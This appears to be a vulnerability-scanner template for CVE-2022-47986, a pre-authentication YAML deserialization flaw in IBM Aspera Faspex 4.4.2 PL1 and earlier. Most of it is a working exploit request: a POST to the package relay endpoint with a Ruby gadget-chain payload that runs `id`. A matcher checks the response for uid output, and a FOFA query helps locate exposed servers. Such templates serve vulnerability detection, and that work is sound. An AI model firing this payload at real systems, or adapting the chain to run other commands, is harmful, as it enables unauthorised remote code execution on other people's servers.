IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
fofa: app="Aspera-Faspex"
PoC代码[已公开]
id: CVE-2022-47986
info:
name: Aspera Faspex Pre Auth RCE
author: zan8in
severity: critical
verified: true
description: |-
IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
fofa: app="Aspera-Faspex"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-47986
tags: cve,cve2022,aspera,faspex,rce,pre-auth
created: 2023/10/30
set:
randstr: randomLowercase(12)
randstr4: randomLowercase(4)
randstr8: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /aspera/faspex/package_relay/relay_package
headers:
Content-Type: application/json
body: |
{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{randstr4}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{randstr8}}", "delivery_title": "{{randstr4}}", "delivery_note": "{{randstr4}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
expression: 'response.status == 500 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)'
expression: r0()